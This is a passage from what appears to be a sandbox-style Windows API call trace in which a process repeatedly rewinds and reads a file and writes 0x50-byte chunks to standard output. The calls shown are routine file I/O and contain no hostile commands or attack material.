lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.757] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.757] GetFileType (hFile=0x4c) returned 0x1 [0092.757] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.757] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.757] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.757] GetFileType (hFile=0x4c) returned 0x1 [0092.757] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.757] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.757] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.757] GetFileType (hFile=0x4c) returned 0x1 [0092.757] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.757] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.757] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.757] GetFileType (hFile=0x4c) returned 0x1 [0092.757] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.757] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.757] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.757] GetFileType (hFile=0x4c) returned 0x1 [0092.757] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.757] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.757] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.757] GetFileType (hFile=0x4c) returned 0x1 [0092.757] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.757] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.758] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.758] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.758] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.758] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.758] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.758] GetFileType (hFile=0x4c) returned 0x1 [0092.758] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.758] GetFileType (hFile=0x4c) returned 0x1 [0092.758] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.758] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.758] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.758] GetFileType (hFile=0x4c) returned 0x1 [0092.758] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.758] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.758] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0092.758] GetFileType (hFile=0x4c) returned 0x1 [0092.758] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.758] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.758] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.758] GetFileType (hFile=0x4c) returned 0x1 [0092.758] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.758] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.758] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.758] GetFileType (hFile=0x4c) returned 0x1 [0092.758] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.758] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.758] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.758] GetFileType (hFile=0x4c) returned 0x1 [0092.758] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.758] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.758] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.758] GetFileType (hFile=0x4c) returned 0x1 [0092.758] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.758] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.759] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.759] SetFilePointerEx (in: 
hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.759] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.759] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.759] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.759] GetFileType (hFile=0x4c) returned 0x1 [0092.759] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.759] GetFileType (hFile=0x4c) returned 0x1 [0092.759] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.759] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.759] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.759] GetFileType (hFile=0x4c) returned 0x1 [0092.759] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.759] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.759] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.759] GetFileType (hFile=0x4c) returned 0x1 [0092.759] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.759] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.759] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.759] GetFileType (hFile=0x4c) returned 0x1 [0092.759] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.759] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: 
lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.759] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.759] GetFileType (hFile=0x4c) returned 0x1 [0092.759] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.759] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.759] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.759] GetFileType (hFile=0x4c) returned 0x1 [0092.759] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.759] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.759] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.760] GetFileType (hFile=0x4c) returned 0x1 [0092.760] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.760] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.760] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.760] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.760] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.760] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.760] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.760] GetFileType (hFile=0x4c) returned 0x1 [0092.760] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.760] GetFileType (hFile=0x4c) returned 0x1 [0092.760] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0092.760] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.760] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.760] GetFileType (hFile=0x4c) returned 0x1 [0092.760] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.760] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.760] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.760] GetFileType (hFile=0x4c) returned 0x1 [0092.760] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.760] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.760] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.760] GetFileType (hFile=0x4c) returned 0x1 [0092.760] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.760] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.760] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.760] GetFileType (hFile=0x4c) returned 0x1 [0092.760] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.760] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.760] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.760] GetFileType (hFile=0x4c) returned 0x1 [0092.760] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0092.760] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.760] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.761] GetFileType (hFile=0x4c) returned 0x1 [0092.761] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.761] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.761] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.761] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.761] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.761] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.761] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.761] GetFileType (hFile=0x4c) returned 0x1 [0092.761] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.761] GetFileType (hFile=0x4c) returned 0x1 [0092.761] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.761] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.761] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.761] GetFileType (hFile=0x4c) returned 0x1 [0092.761] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.761] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 
[0092.761] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.761] GetFileType (hFile=0x4c) returned 0x1 [0092.761] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.761] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.761] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.761] GetFileType (hFile=0x4c) returned 0x1 [0092.761] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.761] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.761] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.761] GetFileType (hFile=0x4c) returned 0x1 [0092.761] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.761] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.761] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.761] GetFileType (hFile=0x4c) returned 0x1 [0092.761] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.761] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.761] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.762] GetFileType (hFile=0x4c) returned 0x1 [0092.762] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.762] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.762] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0092.762] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.762] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.762] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.762] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.762] GetFileType (hFile=0x4c) returned 0x1 [0092.762] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.762] GetFileType (hFile=0x4c) returned 0x1 [0092.762] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.762] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.762] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.762] GetFileType (hFile=0x4c) returned 0x1 [0092.762] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.762] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.762] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.762] GetFileType (hFile=0x4c) returned 0x1 [0092.762] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.762] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.762] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.762] GetFileType (hFile=0x4c) returned 0x1 [0092.762] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.762] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.762] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.762] GetFileType (hFile=0x4c) returned 0x1 [0092.762] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.762] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.762] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.762] GetFileType (hFile=0x4c) returned 0x1 [0092.762] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.762] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.762] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] GetFileType (hFile=0x4c) returned 0x1 [0092.763] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.763] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.763] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.763] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.763] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.763] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] GetFileType (hFile=0x4c) returned 0x1 [0092.763] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] GetFileType 
(hFile=0x4c) returned 0x1 [0092.763] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.763] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] GetFileType (hFile=0x4c) returned 0x1 [0092.763] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.763] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] GetFileType (hFile=0x4c) returned 0x1 [0092.763] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.763] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] GetFileType (hFile=0x4c) returned 0x1 [0092.763] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.763] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] GetFileType (hFile=0x4c) returned 0x1 [0092.763] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.763] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] GetFileType (hFile=0x4c) returned 0x1 [0092.763] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.763] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.763] GetFileType (hFile=0x4c) returned 0x1 [0092.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.764] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.764] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.764] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.764] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.764] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.764] GetFileType (hFile=0x4c) returned 0x1 [0092.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.764] GetFileType (hFile=0x4c) returned 0x1 [0092.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.764] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.764] GetFileType (hFile=0x4c) returned 0x1 [0092.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.764] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, 
lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.764] GetFileType (hFile=0x4c) returned 0x1 [0092.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.764] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.764] GetFileType (hFile=0x4c) returned 0x1 [0092.764] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.764] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: 